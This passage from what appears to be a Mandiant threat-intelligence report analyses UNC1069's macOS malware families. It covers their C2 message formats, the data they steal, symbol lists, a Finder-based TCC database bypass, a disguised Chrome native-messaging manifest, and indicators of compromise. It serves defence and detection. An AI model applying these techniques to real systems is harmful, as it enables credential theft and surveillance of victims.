campaigns by leveraging victim’s identity and data.</span></p> <p><span style="vertical-align: baseline;">Subsequently, Mandiant identified seven distinct malware families during the forensic analysis of the compromised system, with SUGARLOADER being the only malware family already tracked by Mandiant prior to the investigation.</span></p> <h3><span style="vertical-align: baseline;">Technical Appendix</span></h3> <h4><span style="vertical-align: baseline;">WAVESHAPER</span></h4> <p><span style="vertical-align: baseline;">WAVESHAPER is a backdoor written in C++ and packed by an unknown packer that targets macOS. The backdoor supports downloading and executing arbitrary payloads retrieved from its command-and-control (C2 or C&amp;C) server, which is provided via the command-line parameters. To communicate with the adversary infrastructure, WAVESHAPER leverages the curl library for either HTTP or HTTPS, depending on the command-line argument provided.</span></p> <p><span style="vertical-align: baseline;">WAVESHAPER also runs as a daemon by forking itself into a child process that runs in the background detached from the parent session and collects the following system information, which is sent to the C&amp;C server in a HTTP POST request:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Random victim UID (16 alphanumeric chars)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Victim username</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Victim machine name</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">System time zone</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">System boot time using sysctlbyname("kern.boottime")</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Recently installed software</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Hardware model</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">CPU information</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">OS version</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">List of the running processes</span></p> </li> </ul> <p><span style="vertical-align: baseline;">Payloads downloaded from the C&amp;C server are saved to a file system location matching the following regular expression pattern: </span><code style="vertical-align: baseline;">/tmp/\.[A-Za-z0-9]{6}</code><span style="vertical-align: baseline;">.</span></p> <h4><span style="vertical-align: baseline;">HYPERCALL</span></h4> <p><span style="vertical-align: baseline;">HYPERCALL is a Go-based downloader designed for macOS that retrieves malicious dynamic libraries from a designated C&amp;C server. The C&amp;C address is extracted from an RC4-encrypted configuration file that must be present on the disk alongside the binary. Once downloaded, the library is reflectively loaded for in-memory execution.</span></p> <p><span style="vertical-align: baseline;">Mandiant observed recognizable influences from SUGARLOADER in HYPERCALL, despite the new downloader being written in a different language (Golang instead of C++) and having a different development process. These similarities include the use of an external configuration file for the C&amp;C infrastructure, the use of the RC4 algorithm for configuration file decryption, and the capability for reflective library injection.</span></p> <p><span style="vertical-align: baseline;">Notably, some elements in HYPERCALL appear to be incomplete. For instance, the presence of configuration parameters that are of no use reveals a lack of technical proficiency by some of UNC1069's malware developers compared to other North Korea-nexus threat actors.</span></p> <p><span style="vertical-align: baseline;">HYPERCALL accepts a single command-line argument to which it expects a C&amp;C host to connect. This command is then saved to the configuration file located at </span><code style="vertical-align: baseline;">/Library/SystemSettings/.CacheLogs.db</code><span style="vertical-align: baseline;">. HYPERCALL also leverages a hard-coded 16-byte RC4 key to decrypt the data stored within the configuration file, a pattern observed within other UNC1069 malware families. </span></p> <p><span style="vertical-align: baseline;">The HYPERCALL configuration instructed the downloader to communicate with the following C&amp;C servers on TCP port 443:</span></p> <ul> <li role="presentation"><code style="vertical-align: baseline;">wss://supportzm[.]com</code></li> <li role="presentation"><code style="vertical-align: baseline;">wss://zmsupport[.]com</code></li> </ul> <p><span style="vertical-align: baseline;">Once connected, the HYPERCALL registers with the C&amp;C using the following message expecting a response message of 1:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>{ "type": "loader", "client_id": &lt;client_id&gt; }</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 6: Registration message sent to the C&amp;C server</span></span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Once the HYPERCALL has registered with the C&amp;C server, it sends a dynamic library download request:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>{ "type": "get_binary", "system": "darwin" }</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 7: Dynamic library download request message sent to the C&amp;C server</span></span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The C&amp;C server responds to the request with information on the dynamic library to download, followed by the dynamic library content:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>{ "type": &lt;unknown&gt;, "total_size": &lt;total_size&gt; }</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 8: Dynamic library download response message received by the C&amp;C server</span></span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The C&amp;C server informs the HYPERCALL client all of the dynamic library content has been sent via the following message:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>{ "type": "end_chunks" }</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 9: Message sent by the C&amp;C server to mark the end of the dynamic library content</span></span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">After receiving the dynamic library, HYPERCALL sends a final acknowledgement message:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>{ "type": "down_ok" }</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 10: Final acknowledgement message sent by HYPERCALL to the C&amp;C server</span></span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">HYPERCALL then waits for three seconds before executing the downloaded dynamic library in-memory using reflective loading.</span></p> <h4><span style="vertical-align: baseline;">HIDDENCALL</span></h4> <p><span style="vertical-align: baseline;">We assess with high confidence that UNC1069 utilizes the HYPERCALL downloader and HIDDENCALL backdoor as components of a single, synchronized attack lifecycle. </span></p> <p><span style="vertical-align: baseline;">This assessment is supported by forensic observations of HYPERCALL downloading and reflectively injecting HIDDENCALL into system memory. Furthermore, technical examination revealed significant code overlaps between the HYPERCALL Golang binary and HIDDENCALL's Ahead-of-Time (AOT) translation files. Both families utilize identical libraries and follow a distinct "</span><code style="vertical-align: baseline;">t_</code><span style="vertical-align: baseline;">" naming convention for functions (such as </span><code style="font-style: italic; vertical-align: baseline;">t_loader</code><span style="vertical-align: baseline;"> and </span><code style="font-style: italic; vertical-align: baseline;">t_</code><span style="vertical-align: baseline;">), strongly suggesting a unified development environment and shared tradecraft. The use of this custom, integrated tooling suite highlights UNC1069's technical proficiency in developing specialized capabilities to bypass security measures and secure long-term persistence in target networks.</span></p> <h5><span style="vertical-align: baseline;">Rosetta Cache Analysis</span></h5> <p><span style="vertical-align: baseline;">Mandiant has previously documented how <a href="https://cloud.google.com/blog/topics/threat-intelligence/rosetta2-artifacts-macos-intrusions">files from the Rosetta cache can be used to prove program execution</a></span><span style="vertical-align: baseline;">, as well as how malware identification can be possible through <a href="https://cloud.google.com/blog/topics/threat-intelligence/north-korea-supply-chain">analysis of the symbols present in the AOT translation files</a>.</span></p> <p><span style="vertical-align: baseline;">HYPERCALL leveraged the </span><code style="vertical-align: baseline;">NSCreateObjectFileImageFromMemory</code><span style="vertical-align: baseline;"> API call to reflectively load a follow-on backdoor component from memory. When </span><code style="vertical-align: baseline;">NSCreateObjectFileImageFromMemory</code><span style="vertical-align: baseline;"> is called, the executable file that is to be loaded from memory is temporarily written to disk under the </span><code style="vertical-align: baseline;">/tmp/</code><span style="vertical-align: baseline;"> folder, with the filename matching the regular expression pattern </span><code style="vertical-align: baseline;">NSCreateObjectFileImageFromMemory-[A-Za-z0-9]{8}</code><span style="vertical-align: baseline;">. </span></p> <p><span style="vertical-align: baseline;">This intrinsic behaviour, combined with the HIDDENCALL payload being compiled for x86_64 architecture, resulted in the creation of a Rosetta cache AOT file for the reflectively loaded Mach-O executable. Through analysis of the Rosetta cache file, Mandiant was able to assess with high confidence that the reflectively loaded Mach-O executable was the follow-on backdoor component, also written in Golang, that Mandiant tracks as HIDDENCALL. </span></p> <p><span style="vertical-align: baseline;">Listed in Figure 11 through Figure 14 are the symbols and project file paths identified from the AOT file associated with HIDDENCALL execution, as well as the HYPERCALL sample analysed by Mandiant, which were used to assess the functionality of HIDDENCALL.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>_t/common.rc4_encode _t/common.resolve_server _t/common.load_config _t/common.save_config _t/common.generate_uid _t/common.send_data _t/common.send_error_message _t/common.get_local_ip _t/common.get_info _t/common.rsp_get_info _t/common.override_env _t/common.exec_command_with_timeout _t/common.exec_command_with_timeout.func1 _t/common.rsp_exec_cmd _t/common.send_file _t/common.send_file.deferwrap1 _t/common.add_file_to_zip _t/common.add_file_to_zip.deferwrap1 _t/common.zip_file _t/common.zip_file.func1 _t/common.zip_file.deferwrap2 _t/common.zip_file.deferwrap1 _t/common.rsp_zdn _t/common.rsp_dn _t/common.receive_file _t/common.receive_file.deferwrap1 _t/common.unzipFile _t/common.unzipFile.deferwrap1 _t/common.rsp_up _t/common.rsp_inject_explorer _t/common.rsp_inject _t/common.wipe_file _t/common.rsp_wipe_file _t/common.send_cmd_result _t/common.rsp_new_shell _t/common.rsp_exit_shell _t/common.rsp_enter_shell _t/common.rsp_leave_shell _t/common.rsp_run _t/common.rsp_runx _t/common.rsp_test_conn _t/common.rsp_check_event _t/common.rsp_sleep _t/common.rsp_pv _t/common.rsp_pcmd _t/common.rsp_pkill _t/common.rsp_dir _t/common.rsp_state _t/common.rsp_get_cfg _t/common.rsp_set_cfg _t/common.rsp_chdir _t/common.get_file_property _t/common.get_file_property.func1 _t/common.rsp_file_property _t/common.do_work _t/common.do_work.deferwrap1 _t/common.Start _t/common.init_env _t/common.get_config_path _t/common.get_startup_path _t/common.get_launch_plist_path _t/common.get_os_info _t/common.get_process_uid _t/common.get_file_info _t/common.get_dir_entries _t/common.is_locked _t/common.check_event _t/common.change_dir _t/common.run_command_line _t/common.run_command_line.func1 _t/common.copy_file _t/common.copy_file.deferwrap2 _t/common.copy_file.deferwrap1 _t/common.setup_startup _t/common.file_exist _t/common.session_work _t/common.exit_shell _t/common.restart_shell _t/common.start_shell_reader _t/common.watch_shell_output_loop _t/common.watch_shell_output_loop.func1 _t/common.watch_shell_output_loop.func1.deferwrap1 _t/common.exec_with_shell _t/common.start_shell_reader.func1 _t/common.do_work.jump513 _t/common.g_shoud_fork _t/common.CONFIG_CRYPT_KEY _t/common.g_conn _t/common.g_shell_cmd _t/common.g_shell_pty _t/common.stop_reader_chan _t/common.stop_watcher_chan _t/common.g_config_file_path _t/common.g_output_buffer _t/common.g_cfg _t/common.g_use_shell _t/common.g_working _t/common.g_out_changed _t/common.g_reason _t/common.g_outputMutex</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 11: Notable Golang symbols from the HIDDENCALL AOT file analyzed by Mandiant</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>t_loader/common t_loader/inject_mac t_loader/inject_mac._Cfunc_InjectDylibFromMemory t_loader/inject_mac.Inject t_loader/inject_mac.Inject.func1 t_loader/common.rc4_encode t_loader/common.generate_uid t_loader/common.load_config t_loader/common.rc4_decode t_loader/common.save_config t_loader/common.resolve_server t_loader/common.receive_file t_loader/common.Start t_loader/common.check_server_urls t_loader/common.inject_pe t_loader/common.init_env t_loader/common.get_config_path</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 12: Notable Golang symbols from the HYPERCALL AOT file analyzed by Mandiant</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>/Users/mac/Documents/go_t/t/../build/mac/t.a(000000.o) /Users/mac/Documents/go_t/t/../build/mac/t.a(000004.o) /Users/mac/Documents/go_t/t/../build/mac/t.a(000005.o) /Users/mac/Documents/go_t/t/../build/mac/t.a(000006.o) /Users/mac/Documents/go_t/t/../build/mac/t.a(000007.o) /Users/mac/Documents/go_t/t/../build/mac/t.a(000008.o) /Users/mac/Documents/go_t/t/../build/mac/t.a(000009.o) /Users/mac/Documents/go_t/t/../build/mac/t.a(000010.o) /Users/mac/Documents/go_t/t/../build/mac/t.a(000011.o)</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 13: Project file paths from the HIDDENCALL AOT file analyzed by Mandiant</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>/Users/mac/Documents/go_t/t_loader/inject_mac/inject.go /Users/mac/Documents/go_t/t_loader/common/common.go /Users/mac/Documents/go_t/t_loader/common/common_unix.go /Users/mac/Documents/go_t/t_loader/exe.go</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 14: Project file paths from the HYPERCALL AOT file analyzed by Mandiant</span></span></p></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">DEEPBREATH</span></h4> <p><span style="vertical-align: baseline;">A new piece of macOS malware identified during the intrusion was DEEPBREATH, a sophisticated data miner designed to bypass a key component of macOS privacy: the Transparency, Consent, and Control (TCC) database. </span></p> <p><span style="vertical-align: baseline;">Written in Swift, DEEPBREATH's primary purpose is to gain access to files and sensitive personal information.</span></p> <h5><span style="vertical-align: baseline;">TCC Bypass</span></h5> <p><span style="vertical-align: baseline;">I</span><span style="vertical-align: baseline;">nstead of prompting the user for elevated permissions, DEEPBREATH directly manipulates the user's TCC database (</span><code style="vertical-align: baseline;">TCC.db</code><span style="vertical-align: baseline;">). It executes a series of steps to circumvent protections that prevent direct modification of the live database:</span></p> <ol> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Staging: It leverages the Finder application to rename the user's TCC folder and copies the </span><code style="vertical-align: baseline;">TCC.db</code><span style="vertical-align: baseline;"> file to a temporary staging location, which allows it to modify the database unchallenged. </span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Permission Injection: Once staged, the malware programmatically inserts permissions, effectively granting itself broad access to critical user folders like Desktop, Documents, and Downloads.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Restoration: Finally, it restores the modified database back to its original location, giving DEEPBREATH the broad file system access it needs to operate.</span></p> </li> </ol> <p><span style="vertical-align: baseline;">It should be noted that this technique is possible due to the Finder application possessing Full Disk Access (FDA) permissions, which are the permissions necessary to modify the user-specific TCC database in macOS. </span></p> <p><span style="vertical-align: baseline;">To ensure its operation remains uninterrupted, the malware uses an AppleScript to re-launch itself in the background using the </span><code style="vertical-align: baseline;">-autodata</code><span style="vertical-align: baseline;"> argument, detaching from the initial process to continue data collection silently throughout the user's session.</span></p> <p><span style="vertical-align: baseline;">With elevated access, DEEPBREATH systematically targets high-value data:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Credentials: Steals login credentials from the user keychain (</span><code style="vertical-align: baseline;">login.keychain-db</code><span style="vertical-align: baseline;">)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Browser Data: Copies cookies, login data, and local extension settings from major browsers including Google Chrome, Brave, and Microsoft Edge across all user profiles</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Messaging and Notes: Exfiltrates user data from two different versions of Telegram and also targets and copies database files from Apple Notes</span></p> </li> </ul> <p><span style="vertical-align: baseline;">DEEPBREATH is a prime example of an attack vector focused on bypassing core operating system security features to conduct widespread data theft.</span></p> <h4><span style="vertical-align: baseline;">SUGARLOADER</span></h4> <p><span style="vertical-align: baseline;">SUGARLOADER is a downloader written in C++ historically associated with UNC1069 intrusions.</span></p> <p><span style="vertical-align: baseline;">Based on the observations from this intrusion, SUGARLOADER was solely used to deploy CHROMEPUSH. If SUGARLOADER is run without any command arguments, the binary checks for an existing configuration file located on the victim's computer at </span><code style="vertical-align: baseline;">/Library/OSRecovery/com.apple.os.config</code><span style="vertical-align: baseline;">. </span></p> <p><span style="vertical-align: baseline;">The configuration is encrypted using RC4, with a hard-coded 32-byte key found in the binary. </span></p> <p><span style="vertical-align: baseline;">Once decrypted, the configuration data contains up to two URLs that point to the next stage. The URLs are queried to download the next stage of the infection; if the first URL responds with a suitable executable payload, then the second URL is not queried. </span></p> <p><span style="vertical-align: baseline;">The decrypted SUGARLOADER configuration for the sample analysed by Mandiant included the following C&amp;C servers:</span></p> <ul> <li role="presentation"><code style="vertical-align: baseline;">breakdream[.]com:443</code></li> <li role="presentation"><code style="vertical-align: baseline;">dreamdie[.]com:443</code></li> </ul> <h4><span style="vertical-align: baseline;">CHROMEPUSH</span></h4> <p><span style="vertical-align: baseline;">During this intrusion, a second dataminer was recovered and named CHROMEPUSH. This data miner is written in C++ and installs itself as a browser extension targeting Chromium-based browsers, such as Google Chrome and Brave, to collect keystrokes, username and password inputs, and browser cookies, which it uploads to a web server.</span></p> <p><span style="vertical-align: baseline;">CHROMEPUSH establishes persistence by installing itself as a native messaging host for Chromium-based browsers. For Google Chrome, CHROMEPUSH copies itself to </span><code style="vertical-align: baseline;">%HOME%/Library/Application Support/Google/Chrome/NativeMessagingHosts/Google Chrome Docs</code><span style="vertical-align: baseline;"> and creates a corresponding manifest file, </span><code style="vertical-align: baseline;">com.google.docs.offline.json</code><span style="vertical-align: baseline;">, in the same directory.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>{ "name": "com.google.docs.offline", "description": "Native messaging for Google Docs Offline extension", "path": "%HOME%/Library/Application Support/Google/Chrome/NativeMessagingHosts/Google Chrome Docs", "type": "stdio", "allowed_origins": [ "chrome-extension://hennhnddfkgohngcngmflkmejacokfik/" ] }</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 15: Manifest file for Google Chrome native messaging host established by the data miner</span></span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">By installing itself as a native messaging host, CHROMEPUSH will be automatically executed when the corresponding browser is executed. </span></p> <p><span style="vertical-align: baseline;">Once executed via the native messaging host mechanism, the data miner creates a base data directory at </span><code style="vertical-align: baseline;">%HOME%/Library/Application Support/com.apple.os.receipts</code><span style="vertical-align: baseline;"> and performs browser identification. A subdirectory within the base data directory is created with the corresponding identifier, which is based on the detected browser:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Google Chrome leads to the subdirectory being named "</span><code style="vertical-align: baseline;">c".</code></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Brave Browser leads to the subdirectory being named "</span><code style="vertical-align: baseline;">b".</code></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Arc leads to the subdirectory being named "</span><code style="vertical-align: baseline;">a".</code></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Microsoft Edge leads to the subdirectory being named "</span><code style="vertical-align: baseline;">e".</code></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">If none of these match, the subdirectory name is set to "</span><code style="vertical-align: baseline;">u".</code></p> </li> </ul> <p><span style="vertical-align: baseline;">CHROMEPUSH reads configuration data from the file location </span><code style="vertical-align: baseline;">%HOME%/Library/Application Support/com.apple.os.receipts/setting.db.</code><span style="vertical-align: baseline;"> The configuration settings are parsed in JavaScript Objection Notation (JSON) format. The names of the used JSON variables indicate their potential usage:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">cap_on</code><span style="vertical-align: baseline;">: Assumed to control whether screen captures should be taken</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">cap_time</code><span style="vertical-align: baseline;">: Assumed to control the interval of screen captures</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">coo_on</code><span style="vertical-align: baseline;">: Assumed to control whether cookies should be accessed</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">coo_time</code><span style="vertical-align: baseline;">: Assumed to control the interval of accessing the cookie data</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">key_on</code><span style="vertical-align: baseline;">: Assumed to control whether keypresses should be logged</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">C&amp;C URL</span></p> </li> </ul> <p><span style="vertical-align: baseline;">CHROMEPUSH stages collected data in temporary files within the </span><code style="vertical-align: baseline;">%HOME%/Library/Application Support/com.apple.os.receipts/&lt;browser_id&gt;/</code><span style="vertical-align: baseline;"> directory.</span></p> <p><span style="vertical-align: baseline;">These files are then renamed using the following formats:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Screenshots: </span><code style="vertical-align: baseline;">CAYYMMDDhhmmss.dat</code></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Keylogging: </span><code style="vertical-align: baseline;">KLYYMMDDhhmmss.dat</code></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Cookies: </span><code style="vertical-align: baseline;">CK_&lt;browser_identifier&gt;&lt;unknown_id&gt;.dat</code></p> </li> </ul> <p><span style="vertical-align: baseline;">CHROMEPUSH stages and sends the collected data in HTTP POST requests to its C&amp;C server. In the sample analysed by Mandiant, the C&amp;C server was identified as </span><code style="vertical-align: baseline;">hxxp://cmailer[.]pro:80/upload</code><span style="vertical-align: baseline;">. </span></p> <h4><span style="vertical-align: baseline;">SILENCELIFT</span></h4> <p><span style="vertical-align: baseline;">SILENCELIFT is a minimalistic backdoor written in C/C++ that beacons host information to a hard-coded C&amp;C server. The C&amp;C server identified in this sample was identified as </span><code style="vertical-align: baseline;">support-zoom[.]us</code><span style="vertical-align: baseline;">.</span></p> <p><span style="vertical-align: baseline;">SILENCELIFT retrieves a unique ID from the hard-coded file path /Library/Caches/.Logs.db. Notably, this is the exact same path used by the CHROMEPUSH. The backdoor also gets the lock screen status, which is sent to the C&amp;C server with the unique ID. </span></p> <p><span style="vertical-align: baseline;">If executed with root privileges, SILENCELIFT can actively interrupt Telegram communications while beaconing to its C&amp;C server.</span></p> <h3><span style="vertical-align: baseline;">Indicators of Compromise</span></h3> <p><span style="vertical-align: baseline;">To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a <a href="https://www.virustotal.com/gui/collection/d1403f69b1dadfadee1c7d46fd43ac310145339f0a7b49979aead82df8a34f72/summary" rel="noopener" target="_blank">GTI Collection for registered users</a>.</span></p> <h4><span style="vertical-align: baseline;">Network-Based Indicators</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/></colgroup> <thead> <tr> <th scope="col" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Indicator</span></p> </th> <th scope="col" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Description</span></p> </th> </tr> </thead> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">mylingocoin.com</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Hosted the payload that was retrieved and executed to commence the initial infection</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">zoom.uswe05.us</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Hosted the fake Zoom meeting</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">breakdream.com</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SUGARLOADER C&amp;C </span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">dreamdie.com</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SUGARLOADER C&amp;C </span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">support-zoom.us</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SILENCELIFT C&amp;C</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">supportzm.com</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">HYPERCALL C&amp;C</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">zmsupport.com</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">HYPERCALL C&amp;C</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">cmailer.pro</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CHROMEPUSH upload server </span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h4>Host-Based Indicators</h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; 